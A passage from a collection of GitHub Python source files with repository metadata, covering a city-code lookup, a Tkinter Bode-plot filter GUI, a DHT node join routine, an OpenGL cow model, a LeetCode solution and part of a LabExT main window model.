r'E:\\新建文件夹\\weather.api\\src\\main\\resources\\citycode-2019-08-23.json'\n\n\ndef openfile(filename, encoding='utf-8'):\n with open(filename, 'r', encoding=encoding)as f:\n return json.loads(f.read())\n\n\n# for i in city_code_list:\n# # print(i)\n# if i['city_code'] != '':\n# print(i['city_name'], i['city_code'])\n\ndef get_city_code(citynames):\n cityname_list = []\n city_infos = openfile(filename)\n for i in city_infos:\n for cityname in citynames:\n if i['city_name'] == cityname:\n cityname_list.append((i['city_name'], i['city_code']))\n return cityname_list\n\n\ndef main(citynames):\n city_codes = get_city_code(citynames)\n return city_codes\n\n\nif __name__ == '__main__':\n # citynames = ['隰县', '临汾', '太原', '北京']\n citynames = ['隰县']\n print(main(citynames)[0][0])\n","repo_name":"Sharkchili-git/homework","sub_path":"HelloDjango/weatherapi/city_code.py","file_name":"city_code.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33935838774","text":"import tkinter as tk\nimport Config\nfrom tkinter import *\n\nfrom UserInput import *\n\n\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.backends._backend_tk import NavigationToolbar2Tk\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nfrom numpy import pi\n\n\n#Este menu es el correspondiente al grafico de Bode\nclass Grafico(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent, bg='#42f498')\n\n self.controller = controller\n self.parent = parent\n\n self.graph = tk.Canvas(self)\n\n self.fig, self.ax1 = plt.subplots()\n\n self.dataPlot = FigureCanvasTkAgg(self.fig, master=self.graph)\n self.nav = NavigationToolbar2Tk(self.dataPlot, self.graph)\n self.dataPlot.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.dataPlot._tkcanvas.pack(side=tk.BOTTOM, fill=tk.X, expand=1)\n\n self.graph.pack(side=tk.TOP, expand=1, fill=tk.BOTH)\n\n self.backButton = tk.Button(\n self,\n height=2,\n width=50,\n text=\"Volver\",\n font=Config.SMALL_FONT,\n background=\"#cfffd5\",\n command=self.goback\n\n )\n self.backButton.pack(side=tk.TOP, fill=tk.BOTH)\n\n def focus(self):\n self.ax1.clear()\n\n self.ax1.minorticks_on()\n self.ax1.grid(which='major', linestyle='-', linewidth=0.3, color='black')\n self.ax1.grid(which='minor', linestyle=':', linewidth=0.1, color='black')\n\n\n #Aca decide qeu dibujar, puede dibujar orden 1 o 2, luego alto, bajo, tod, banda o notch, y luego en rads, hertz dbs o bs\n if orden['orden1']:\n if filtro['alto']:\n self.plotPasaAlto1Orden()\n elif filtro['bajo']:\n self.plotPasaBajo1Orden()\n else:\n self.plotPasaTodo1Orden()\n elif orden['orden2']:\n if filtro['alto']:\n self.plotPasaAlto2Orden()\n elif filtro['bajo']:\n self.plotPasaBajo2Orden()\n elif filtro['todo']:\n self.plotPasaTodo2Orden()\n elif filtro['banda']:\n self.plotPasaBanda2Orden()\n else:\n self.plotPasaNotch2Orden()\n\n self.dataPlot.draw()\n\n\n def goback(self):\n from Menu_Order1 import Orden1\n self.controller.showFrame(Orden1)\n\n\n\n #en esta función esta lo qeu dibujo ya sea el bode o el grafico de la respuesta\n #decide de que tipo de garfico se tratasegun lo qeu dice userinput y luego lo grafica\n def plotPasaAlto1Orden(self):\n ganancia = userinput['c']\n f0 = userinput['f0']\n w0 = 2 * pi * f0\n\n k = ganancia/w0\n ceros = [k, 0]\n polos = [0, 1/w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2)\n f = w/(2 * pi)\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n def plotPasaBajo1Orden(self):\n ganancia = userinput['c']\n f0 = userinput['f0']\n w0 = 2 * pi * f0\n\n k = ganancia\n ceros = [k]\n polos = [0, 1/w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2)\n f = w / (2 * pi)\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n def plotPasaTodo1Orden(self):\n ganancia = userinput['c']\n f0 = userinput['f0']\n k = ganancia\n\n w0 = f0 * 2 * pi\n ceros = [k / w0, -k]\n polos = [0, 1 / w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2)\n f = w / (2 * pi)\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n def plotPasaAlto2Orden(self):\n e = userinput['e']\n w0 = userinput['wo']\n\n if ganancia['gmax']:\n gain = userinput['cmax']\n k = ((2 * e * gain * np.sqrt(1 - e * e))/(w0 * w0))\n\n else:\n gain = userinput['c']\n k = gain/(w0*w0)\n\n ceros = [k, 0, 0]\n polos = [1/(w0*w0), (2*e)/w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2, n=500)\n f = w/np.pi\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n\n def plotPasaBajo2Orden(self):\n w0 = userinput['wo']\n e = userinput['e']\n\n if ganancia['gmax']:\n gain = userinput['cmax']\n k = gain * 2 * e * np.sqrt(1 - e * e)\n else:\n gain = userinput['c']\n k = gain\n\n ceros = [k]\n polos = [1/(w0*w0), 2*e/w0, 1]\n\n sys2 = signal.lti(ceros, polos)\n\n w, dB, phase = signal.bode(sys2, n=500)\n\n f = w/np.pi\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n def plotPasaTodo2Orden(self):\n ganancia = userinput['c']\n w0 = userinput['wo']\n e = userinput['e']\n\n k = ganancia\n\n ceros = [k/(w0**2), -2*k*e/w0, k]\n polos = [1 / (w0 * w0), 2 * e / w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2)\n\n f = w / np.pi\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n def plotPasaBanda2Orden(self):\n w0 = userinput['wo']\n e = userinput['e']\n\n gain = userinput['c']\n k = gain * 2 * e / w0\n\n ceros = [k, 0]\n polos = [1/(w0**2), 2*e/w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2, w=None, n=500)\n\n f = w/np.pi\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n def plotPasaNotch2Orden(self):\n ganancia = userinput['c']\n w0 = userinput['wo']\n e = userinput['e']\n\n k = ganancia\n ceros = [k / (w0 ** 2), 0, k]\n polos = [1 / (w0 ** 2), 2 * e / w0, 1]\n\n sys2 = signal.lti(ceros, polos)\n\n w, dB, phase = signal.bode(sys2, n=500)\n\n f = w / (2 * np.pi)\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n def grafBode(self, f, dB, w):\n if ejex['Hertz'] and ejey['Decibeles']:\n self.ax1.semilogx(f, dB)\n self.ax1.set_xlabel('Hz')\n self.ax1.set_ylabel('dB')\n self.ax1.set_title('Base 10')\n self.ax1.grid(True)\n\n elif ejex['Radianes'] and ejey['Decibeles']:\n self.ax1.semilogx(w, dB)\n self.ax1.set_xlabel('rad/s')\n self.ax1.set_ylabel('B')\n self.ax1.set_title('Base 10')\n self.ax1.grid(True)\n\n elif ejex['Hertz'] and ejey['Veces']:\n veces = 10**(dB/20)\n self.ax1.semilogx(f, veces)\n self.ax1.set_xlabel('Hz')\n self.ax1.set_ylabel('|H| veces')\n self.ax1.set_title('Base 10')\n self.ax1.grid(True)\n\n elif ejex['Radianes'] and ejey['Veces']:\n veces = 10**(dB/20)\n self.ax1.semilogx(w, veces)\n self.ax1.set_xlabel('rad/s')\n self.ax1.set_ylabel('|H| veces')\n self.ax1.set_title('Base 10')\n self.ax1.grid(True)\n\n def grafSignal(self, sys2, w0):\n if senhal['senoide']:\n amp = senhalparams['Amplitud']\n w1 = senhalparams['frecuencia']\n t = np.linspace(0, 5, 500)\n u = amp * np.sin(w1 * t)\n\n tout, y, x = signal.lsim(sys2, u, t)\n\n self.ax1.plot(tout, y)\n self.ax1.set_xlabel('seg')\n self.ax1.set_ylabel('A (ammplitud)')\n self.ax1.grid(True)\n\n elif senhal['pulso']:\n amp = senhalparams['Amplitud']\n t = np.linspace(0, 5 * (1 / w0), 5000)\n u = amp * (np.sign(t) + 1)\n\n tout, y, x = signal.lsim(sys2, u, t)\n\n self.ax1.plot(tout, y)\n self.ax1.set_xlabel('seg')\n self.ax1.set_ylabel('A (ammplitud)')\n self.ax1.grid(True)\n\n else:\n amp = senhalparams['Amplitud']\n duty = senhalparams['DutyCicle']\n f1 = senhalparams['frecuencia']\n w1 = f1 * 2 * np.pi\n t = np.linspace(0, 2, 500)\n u = amp * signal.square(2 * np.pi * w1 * t, duty)\n\n tout, y, x = signal.lsim(sys2, u, t)\n\n self.ax1.plot(tout, y)\n self.ax1.set_xlabel('seg')\n self.ax1.set_ylabel('A (ammplitud)')\n self.ax1.grid(True)\n\n def grafBodefase(self, f, w, phase):\n\n if ejex['Radianes'] and ejey['Grados']:\n self.ax1.semilogx(w, phase)\n self.ax1.set_xlabel('rad/s')\n self.ax1.set_ylabel('Grados')\n self.ax1.grid(True)\n\n elif ejex['Hertz'] and ejey['Grados']:\n self.ax1.semilogx(f, phase)\n self.ax1.set_xlabel('Hz')\n self.ax1.set_ylabel('Grados')\n","repo_name":"CarlosAngelChen/tp-electrotecnia","sub_path":"GUI/Menu_Grafico.py","file_name":"Menu_Grafico.py","file_ext":"py","file_size_in_byte":9847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32315928924","text":"import threading\nimport time\nfrom random import randint\n\nfrom node import Node\nfrom node_proxy import NodeProxy\n\n\nclass DynamicNode(Node):\n ALLOWED_ACTIONS = Node.ALLOWED_ACTIONS.union({\n 'join_response_success',\n 'join_response_failure'\n })\n\n def __init__(self, node_list, *args, **kwargs):\n super(DynamicNode, self).__init__(*args, **kwargs)\n\n self.node_list = node_list\n self.joined = False\n self.wait_for_join_response = None\n\n def run(self):\n server_thread = threading.Thread(target=self.tcp_server.serve_forever)\n server_thread.daemon = True\n server_thread.start()\n self._join_network()\n\n def _join_network(self):\n while not self.joined:\n node_index = randint(0, len(self.node_list)-1)\n selected_node = NodeProxy(*self.node_list[node_index])\n _, _, next_id_number = self.node_list[(node_index+1) %\n len(self.node_list)]\n\n my_id = randint(*sorted((selected_node.id_number+1,\n next_id_number)))\n\n self.wait_for_join_response = True\n try:\n selected_node.join(\n id_number=my_id,\n recipient_ip=self.node.ip,\n recipient_port=self.node.port\n )\n except IOError:\n self.logger.error(\"static node %s not responding\" %\n selected_node.id_number)\n self.wait_for_join_response = False\n\n while self.wait_for_join_response:\n time.sleep(1)\n\n self.retrieve_data()\n \n def retrieve_data(self):\n self.logger.debug('retrieving data')\n data = self.next_node.get_smaller_key_values(key=self.node.id_number)\n self.logger.debug('data received: %s' % str(data))\n self.dictionary.update(data)\n \n def join_response_success(self, id_number,\n prev_ip, prev_port, prev_id, next_ip,\n next_port, next_id, second_next_ip,\n second_next_port, second_next_id):\n self.logger.debug(\"join successful, id: %d\" % id_number)\n self.node.id_number = id_number\n self.prev_node = NodeProxy(prev_ip, prev_port, prev_id)\n self.next_node = NodeProxy(next_ip, next_port, next_id)\n self.second_next_node = NodeProxy(second_next_ip, second_next_port,\n second_next_id)\n self.joined = True\n self.wait_for_join_response = False\n\n def join_response_failure(self, message):\n self.logger.debug(\"join failed because \"+message)\n self.wait_for_join_response = False\n","repo_name":"sjazayeri/network-ca3","sub_path":"dht/dynamic_node.py","file_name":"dynamic_node.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23421562378","text":"class Student:\n major=\"CSE\"\n def __init__(self,rollNum,name):\n self.rollNum=rollNum\n self.name=name\ns1 = Student(1,\"Neeraj\")\nprint(s1.major)\nprint(s1.rollNum)\nprint(s1.name)\nprint(Student.major)","repo_name":"Neeraj909/pythonLearning","sub_path":"Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22018280835","text":"from OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\nfrom OpenGL.GLUT import *\r\nfrom texture import load_texture\r\nfrom utils import draw_item, draw_item_texture, textured_sphere, draw_solid_sphere\r\n\r\ndef cow(center_x, center_z, len_z, head_angle_display_r, head_angle_display_u, \r\n tail_angle_display_r, tail_angle_display_u, left_legs_angle_u, right_legs_angle_u, legs_angle_l_r):\r\n leg_len = len_z\r\n len_x = len_y = (2/3)*len_z\r\n center_y = len_y/2 + leg_len\r\n\r\n # body\r\n glColor3f(1, 1, 1)\r\n draw_body(center_x, center_y, center_z, len_x, len_y, len_z)\r\n # head\r\n head_x = center_x\r\n head_y = center_y + (1/3)*len_y\r\n head_z = center_z - (3/7)*len_z\r\n\r\n neck_x = len_x/3\r\n neck_y = len_x/2\r\n neck_z = len_x\r\n\r\n draw_head(head_x, head_y, head_z, neck_x, neck_y, neck_z, head_angle_display_r, head_angle_display_u)\r\n # legs\r\n draw_tail(center_x, center_y, center_z + (7/8)*len_z, len_x, \r\n tail_angle_display_r, tail_angle_display_u)\r\n draw_legs(center_x, center_y, center_z, len_x, len_z, left_legs_angle_u, right_legs_angle_u, legs_angle_l_r)\r\n\r\ndef draw_legs(center_x, center_y, center_z, len_x, len_z, left_angle_u, right_angle_u, angle_l_r):\r\n glColor3f(1,1,1)\r\n weidth_x = (3/7)*len_x\r\n weidth_z = (3/2)*weidth_x\r\n\r\n draw_leg(center_x - (1/2)*len_x, center_y, center_z - (3/4)*len_z , weidth_x, weidth_z, \r\n left_angle_u, angle_l_r)\r\n draw_leg(center_x - (1/2)*len_x, center_y, center_z + (3/4)*len_z - weidth_z, \r\n weidth_x, weidth_z, left_angle_u, angle_l_r)\r\n draw_leg(center_x + (1/2)*len_x - weidth_x, center_y, center_z - (3/4)*len_z, \r\n weidth_x, weidth_z, right_angle_u, angle_l_r)\r\n draw_leg(center_x + (1/2)*len_x - weidth_x, center_y, center_z + (3/4)*len_z - weidth_z, \r\n weidth_x, weidth_z, right_angle_u, angle_l_r)\r\n \r\ndef draw_leg(x,y,z, weidth_x, weidth_z, angle_u, angle_l_r):\r\n hoof_heigth = weidth_x\r\n vertices = [(x, y, z), # first four top ssquare\r\n (x, y, z + weidth_z),\r\n (x + weidth_x, y, z + weidth_z),\r\n (x + weidth_x, y, z),\r\n (x, hoof_heigth, z), # second four bottom ssquare\r\n (x, hoof_heigth, z + weidth_z),\r\n (x + weidth_x, hoof_heigth, z + weidth_z),\r\n (x + weidth_x, hoof_heigth, z),\r\n (x, 0, z - (1/3)*weidth_z), # hoof bace\r\n (x, 0, z + weidth_z),\r\n (x + weidth_x, 0, z + weidth_z),\r\n (x + weidth_x, 0, z - (1/3)*weidth_z)] \r\n indices = [(0, 1, 2, 3),\r\n (0, 1, 5, 4),\r\n (1, 2, 6, 5),\r\n (2, 3, 7, 6),\r\n (0, 3, 7, 4),\r\n (5, 6, 10, 9),\r\n (6, 7, 11, 10),\r\n (7, 4, 8, 11),\r\n (4, 5, 9, 8),\r\n (8, 9, 10, 11)] \r\n leg_texture_id = load_texture(\"legs_texture.png\")\r\n\r\n glPushMatrix()\r\n glTranslate(x,y,z)\r\n glRotatef(angle_u, 1, 0, 0)\r\n glRotatef(angle_l_r, 0, 0, 1)\r\n glTranslate(-x,-y,-z)\r\n draw_item_texture(vertices, indices, leg_texture_id, 1)\r\n glPopMatrix()\r\n\r\ndef draw_body(center_x, center_y, center_z, len_x, len_y, len_z):\r\n cow_texture_id = load_texture(\"cow_texture.png\")\r\n textured_sphere(center_x, center_y, center_z, len_x, len_y, len_z, cow_texture_id)\r\n draw_udders(center_x, center_y-(3/4)*len_y, center_z, len_x/2)\r\n\r\ndef draw_head(x, y, z, neck_x, neck_y, neck_z, head_angle_display_r, head_angle_display_u): # (x,y,z) point inside body\r\n vertices = [(x, y, z), #0\r\n (x-neck_x, y+neck_y, z-neck_z), #1\r\n (x+neck_x, y+neck_y, z-neck_z), #2\r\n (x+2*neck_x, y, z-neck_z), #3\r\n (x, y-neck_y, z-neck_z), #4\r\n (x-2*neck_x, y, z-neck_z), #5\r\n (x-2*neck_x, y-neck_y,z-(4/3)*neck_z), #6\r\n (x+2*neck_x, y-neck_y,z-(4/3)*neck_z), #7\r\n (x-(1/2)*neck_x, y+(1/2)*neck_y, z-(11/6)*neck_z), #8\r\n (x+(1/2)*neck_x, y+(1/2)*neck_y, z-(11/6)*neck_z), #9\r\n (x-(1/2)*neck_x, y+(1/2)*neck_y, z-(13/6)*neck_z), #10\r\n (x+(1/2)*neck_x, y+(1/2)*neck_y, z-(13/6)*neck_z), #11\r\n (x+(3/4)*neck_x, y-neck_y,z-(13/6)*neck_z), #12\r\n (x+(3/4)*neck_x, y-(1/2)*neck_y,z-(13/6)*neck_z), #13\r\n (x-(3/4)*neck_x, y-neck_y,z-(13/6)*neck_z), #14\r\n (x-(3/4)*neck_x, y-(1/2)*neck_y,z-(13/6)*neck_z)] #15\r\n indices = [((0, 1, 2), 1),\r\n ((0, 2, 3), 0),\r\n ((0, 3, 4), 0),\r\n ((0, 4, 5), 0),\r\n ((0, 5, 1), 0),\r\n ((2, 3, 7), 0),\r\n ((1, 5, 6), 0),\r\n ((3, 4, 7), 0),\r\n ((4, 5, 6), 0),\r\n ((4, 6, 7), 0),\r\n ((6, 7, 12, 14), 0),\r\n ((1, 2, 9, 8), 1),\r\n ((2, 7, 12, 9), 0),\r\n ((1, 6, 14, 8), 0),\r\n ((8, 9, 11, 10), 1),\r\n ((9, 11, 13, 12), 2),\r\n ((8, 10, 15, 14), 2),\r\n ((12, 14, 15, 13), 2),\r\n ((10, 11, 13, 15), 2)]\r\n colors = [(0,0,0), # black\r\n (1,1,1), # white\r\n (1, 204/255, 204/255) # pink\r\n ]\r\n glPushMatrix()\r\n glTranslate(x,y,z)\r\n glRotatef(head_angle_display_r, 0, 1, 0)\r\n glRotatef(head_angle_display_u, 1, 0, 0)\r\n glTranslate(-x,-y,-z)\r\n draw_item(vertices, indices, colors)\r\n \r\n left_eye = (x-neck_x, y+(1/3)*neck_y,z-(4/3)*neck_z)\r\n right_eye = (x+neck_x, y+(1/3)*neck_y,z-(4/3)*neck_z)\r\n left_ear = vertices[5]\r\n right_ear = vertices[3]\r\n left_nose = (x-(1/4)*neck_x, y+(1/4)*neck_y, z-(13/6)*neck_z)\r\n right_nose = (x+(1/4)*neck_x, y+(1/4)*neck_y, z-(13/6)*neck_z)\r\n\r\n eyes(left_eye,right_eye, (1/2)*neck_x)\r\n ears(left_ear, right_ear, neck_x, (3/4)*neck_x)\r\n nose(left_nose,right_nose, (1/4)*neck_x)\r\n glPopMatrix()\r\n\r\ndef nose(left,right, size):\r\n glColor3f(0, 0, 0)\r\n x, y, z = left\r\n draw_solid_sphere(x, y, z, size, size, size)\r\n x, y, z = right\r\n draw_solid_sphere(x, y, z, size, size, size)\r\n\r\ndef eyes(left,right, size):\r\n one_eye(left, \"left\", size)\r\n one_eye(right, \"right\", size)\r\n\r\ndef one_eye(place,side,size):\r\n glColor3f(1, 1, 1)\r\n x, y, z = place\r\n draw_solid_sphere(x, y, z, size, size, size)\r\n glColor3f(0, 0, 0)\r\n if side == \"left\":\r\n x -= (2/3)*size\r\n else:\r\n x += (2/3)*size\r\n size = size/2\r\n z -= size\r\n draw_solid_sphere(x, y, z, size, size, size)\r\n\r\ndef ears(left,right, len, weidth):\r\n one_ear(left, \"left\", len, weidth)\r\n one_ear(right, \"right\", len, weidth)\r\n\r\ndef one_ear(place, side, len, weidth):\r\n glColor3f(0, 0, 0)\r\n x, y, z = place\r\n if side == \"left\":\r\n x -= len/2\r\n else:\r\n x += len/2\r\n draw_solid_sphere(x, y, z, len, weidth, weidth)\r\n glColor3f(1, 204/255, 204/255)\r\n len /= 2\r\n z -= (5/8)*weidth\r\n weidth /= 2\r\n draw_solid_sphere(x, y, z, len, weidth, weidth)\r\n\r\ndef draw_udders(center_x, center_y, center_z, len):\r\n glColor3f(1, 204/255, 204/255)\r\n draw_solid_sphere(center_x, center_y, center_z, len, len, len)\r\n #teats\r\n teat_weidth = (1/4)*len\r\n teat_y = center_y - (1/4)*len\r\n draw_solid_sphere(center_x - len/2, teat_y, center_z - len/2, teat_weidth, len, teat_weidth)\r\n draw_solid_sphere(center_x - len/2, teat_y, center_z + len/2, teat_weidth, len, teat_weidth)\r\n draw_solid_sphere(center_x + len/2, teat_y, center_z - len/2, teat_weidth, len, teat_weidth)\r\n draw_solid_sphere(center_x + len/2, teat_y, center_z + len/2, teat_weidth, len, teat_weidth)\r\n\r\ndef draw_tail(x, y, z, len, tail_angle_display_r, tail_angle_display_u): \r\n # (x,y,z) attachment point to the body \r\n tail_weidth = (1/4)*len\r\n\r\n vertices = [(x + (1/2)*tail_weidth, y, z), #0\r\n (x - (1/2)*tail_weidth, y, z), #1\r\n (x + (1/2)*tail_weidth, y, z + tail_weidth), #2\r\n (x - (1/2)*tail_weidth, y, z + tail_weidth), #3\r\n (x + (1/2)*tail_weidth, y - len, z), #4\r\n (x - (1/2)*tail_weidth, y - len, z), #5\r\n (x + (1/2)*tail_weidth, y - len, z + tail_weidth), #6\r\n (x - (1/2)*tail_weidth, y - len, z + tail_weidth)] #7\r\n indices = [((0, 1, 3, 2), 0),\r\n ((4, 5, 7, 6), 0),\r\n ((0, 1, 5, 4), 0),\r\n ((0, 2, 6, 4), 0),\r\n ((2, 3, 7, 6), 0),\r\n ((3, 1, 5, 7), 0)]\r\n \r\n glPushMatrix()\r\n glTranslate(x,y,z)\r\n glRotatef(tail_angle_display_r, 0, 0, 1)\r\n glRotatef(tail_angle_display_u, 1, 0, 0)\r\n glTranslate(-x,-y,-z)\r\n draw_item(vertices, indices, [(0,0,0)])\r\n glColor3f(1, 1, 1)\r\n draw_solid_sphere(x, y - len - (1/2)*tail_weidth, z + (1/2)*tail_weidth, (2/3)*tail_weidth, \r\n (3/2)*tail_weidth, (2/3)*tail_weidth)\r\n glPopMatrix()\r\n\r\n","repo_name":"yuvalg4/cow-project","sub_path":"cow.py","file_name":"cow.py","file_ext":"py","file_size_in_byte":8972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41116331174","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\nheaders_transfers_keywords = (\"Name\", \"Category\",\"TorrentsFound\",\"Max.Age\", \"Min.Seeds\" ,\"Max.Size\",\"Status\", \"Action\",\"AddedOn\")\n\nheaders_transfers = {\"name\":0, \n \"categ\":1, \n \"max_Age\":3 ,\n \"min_Seeds\":4, \n \"max_Size\":5,\n \"status\":6, \n \"action\":7,\n \"added_On\":8,\n \"torrents_Found\":2\n }\n\n\nheaders_torrents = {\"name\":0,\"age\":1,\"date\":2,\"size\":3,\"size_Mb\":4,\"seeds\":5,\"peers\":6,\"categ\":7,\"hash\":8, \"fid\":9}\n\nheaders_torrents_keywords = (\"Name\",\"Age\",\"Date\",\"Size\",\"SizeMB\",\"Seeders\",\"Peers\",\"Category\",\"Hash\", \"FilterId\")","repo_name":"thegreyd/znotify","sub_path":"transfers.py","file_name":"transfers.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71374621924","text":"class Solution(object):\n def luckyNumbers(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[int]\n \"\"\"\n\n min_in_rows = list()\n max_in_cols = [0] * len(matrix[0])\n lucky_numbers = list()\n\n print(max_in_cols)\n for i in range(len(matrix)):\n # finding minimum from row\n min_in_rows.append(min(matrix[i]))\n\n for j in range(len(matrix[i])):\n max_in_cols[j] = max(list([max_in_cols[j], matrix[i][j]])) #\n\n i += 1\n\n print(min_in_rows)\n print(max_in_cols)\n\n for i in range(len(min_in_rows)):\n for j in range(len(max_in_cols)):\n if min_in_rows[i] == max_in_cols[j]:\n lucky_numbers.append(min_in_rows[i])\n\n return lucky_numbers\n\n\ns = Solution()\nprint(s.luckyNumbers([[7,8],[1,2]]))\n","repo_name":"yogesh-chaudhari-77/leetCodeChallenges","sub_path":"1380. Lucky Numbers in a Matrix.py","file_name":"1380. Lucky Numbers in a Matrix.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30810139560","text":"import logging\nfrom tkinter import BooleanVar, StringVar\n\nfrom LabExT.Model.ExperimentHandler import ExperimentHandler\nfrom LabExT.Utils import DeprecatedException\nfrom LabExT.View.Controls.ControlPanel import ControlCommand\n\n\nclass MainWindowModel:\n \"\"\"\n The model class for the Main window.\n Contains all data, and functions to manipulate said data.\n \"\"\"\n application_title = 'The Laboratory Tool'\n\n def __init__(self, controller, root, experiment_manager):\n self.root = root\n self.controller = controller\n self.view = None\n self.experiment_manager = experiment_manager\n self.chiptable_settings_path = 'experiment_chip_settings.json'\n self.savetable_settings_path = 'experiment_save_settings.json'\n self.axis_settings_path = 'mainwindow_axis_settings.json'\n self.currently_plotted_meas_name = None\n\n # do not let the user set the experiment settings manually\n self.allow_change_chip_params = BooleanVar(self.root, False)\n self.allow_change_save_params = BooleanVar(self.root, False)\n\n # from the old viewmodel file\n self.logger = logging.getLogger()\n self.logger.debug('Initialise MainWindowViewModel with tkinter: %s experiment_manager: %s',\n root,\n self.experiment_manager)\n\n self.app_width = self.root.winfo_screenwidth()\n self.app_height = self.root.winfo_screenheight()\n\n self.logger.debug('Screen size: %sx%s', self.app_width, self.app_height)\n\n # definitions for button commands\n self.commands = list()\n start_button = ControlCommand(\n self.controller.start, self.root, name='Run (F5)')\n self.commands.append(start_button)\n stop_button = ControlCommand(\n self.controller.stop, self.root, name='Abort (Escape)', can_execute=False)\n self.commands.append(stop_button)\n\n self.experiment = None\n self.chip_parameters = None\n self.save_parameters = None\n self.live_plot_data = None\n self.selec_plot_data = None\n self.last_opened_new_meas_wizard_controller = None\n\n self.load_exp_parameters()\n\n # handler to run experiments asynchronously\n self.experiment_handler = ExperimentHandler()\n self.experiment_handler.current_experiment = self.experiment\n # listen if the experiment is finished\n self.experiment_handler.experiment_finished.append(self.on_experiment_finished)\n\n # initialise execution control variables\n self.var_mm_pause = BooleanVar(self.root)\n self.var_mm_pause.trace(\"w\", self.exctrl_vars_changed)\n self.var_mm_pause_reason = StringVar(self.root)\n self.var_auto_move = BooleanVar(self.root)\n self.var_auto_move.trace(\"w\", self.exctrl_vars_changed)\n self.var_auto_move_reason = StringVar(self.root)\n self.var_sfp_ena = BooleanVar(self.root)\n self.var_sfp_ena.trace(\"w\", self.exctrl_vars_changed)\n self.var_sfp_ena_reason = StringVar(self.root)\n self.var_imeas_wait_time_str = StringVar(self.root, \"0.0\")\n self.var_imeas_wait_time_str.trace(\"w\", self.exctrl_vars_changed)\n\n # status of various sub-modules\n self.status_mover_connected_stages = BooleanVar(self.root)\n self.status_mover_connected_stages.trace(\"w\", self.submodule_status_updated)\n self.status_mover_can_move_to_device = BooleanVar(self.root)\n self.status_mover_can_move_to_device.trace(\"w\", self.submodule_status_updated)\n self.status_sfp_initialized = BooleanVar(self.root)\n self.status_sfp_initialized.trace(\"w\", self.submodule_status_updated)\n\n # for testing across threads\n self.allow_GUI_changes = True # set to False to not invoke TK callbacks\n\n def load_exp_parameters(self):\n \"\"\"\n Loads all experiment parameters and saves them within the model.\n \"\"\"\n if self.experiment_manager.exp:\n self.experiment = self.experiment_manager.exp\n self.chip_parameters = self.experiment_manager.exp.chip_parameters\n self.save_parameters = self.experiment_manager.exp.save_parameters\n self.live_plot_data = self.experiment.live_plot_collection\n self.selec_plot_data = self.experiment.selec_plot_collection\n\n def experiment_changed(self, ex):\n raise DeprecatedException(\"Experiment object must not be recreated!\")\n\n def settings(self):\n raise DeprecationWarning(\"Open Settings window is deprecated. Do not use!\")\n\n def on_experiment_start(self):\n \"\"\"\n Upon start of the experiment alters which buttons are pressable.\n \"\"\"\n if not self.allow_GUI_changes:\n return\n\n # change control button states\n self.commands[0].can_execute = False # disable the start button\n self.commands[1].can_execute = True # enable the stop button\n # disable change in experiment parameters\n self.allow_change_chip_params.set(False)\n self.allow_change_save_params.set(False)\n\n def on_experiment_finished(self):\n \"\"\"Called when an experiment is finished. Resets control\n buttons.\n \"\"\"\n if not self.allow_GUI_changes:\n return\n\n self.logger.debug('Experiment finished, resetting controls...')\n self.commands[0].can_execute = True # enable the start button\n self.commands[1].can_execute = False # disable the stop button\n # enable change in save file parameters\n self.allow_change_save_params.set(True)\n\n def 